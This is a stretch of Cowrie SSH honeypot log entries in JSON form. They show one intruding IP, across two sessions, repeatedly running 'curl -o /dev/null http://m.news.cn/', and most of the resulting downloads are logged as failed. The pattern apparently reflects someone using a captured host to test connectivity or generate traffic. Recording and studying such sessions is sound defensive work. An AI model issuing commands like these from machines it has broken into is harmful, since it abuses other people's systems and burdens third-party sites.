{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.893129Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.901106Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.902274Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.922757Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.923954Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.933835Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.936177Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.954232Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.955560Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:50.974895Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.975958Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.977667Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:50.979701Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.001179Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.002914Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.013718Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.015515Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.026433Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.027575Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.048872Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.050141Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.074414Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.076292Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.097753Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.099382Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.112231Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.113334Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.124529Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.125668Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.155834Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.157500Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.159986Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.160935Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.172755Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.173915Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.183508Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.214485Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.215602Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.233261Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.234303Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.255143Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.257041Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.292689Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.293897Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.309330Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.311193Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.336531Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.338350Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.354073Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.394273Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.395937Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.442785Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.444898Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.457935Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.459258Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.478546Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.480047Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.521153Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.522908Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.562074Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.563440Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.587514Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.626377Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.627583Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.634115Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.655449Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.657178Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.672132Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.673187Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.704567Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.705838Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.715189Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.716365Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.752414Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.753552Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.759036Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.760043Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.803457Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.804678Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.807592Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.809823Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.810791Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.812860Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.855201Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.857371Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.859502Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.860328Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.866964Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.867966Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.898994Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.900956Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.912784Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.913812Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:51.916141Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.917011Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.945510Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.947257Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.996770Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:51.998078Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.075803Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.077332Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.125215Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.126166Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.128118Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.129280Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.136958Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.138104Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.153523Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.180178Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.181424Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.184817Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.187033Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.188418Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.223812Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.225040Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.228308Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.229242Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.261620Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.265284Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.266170Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.272000Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:52.272859Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:52.301007Z","src_ip":"212.227.125.160","session":"7541ed730449"}
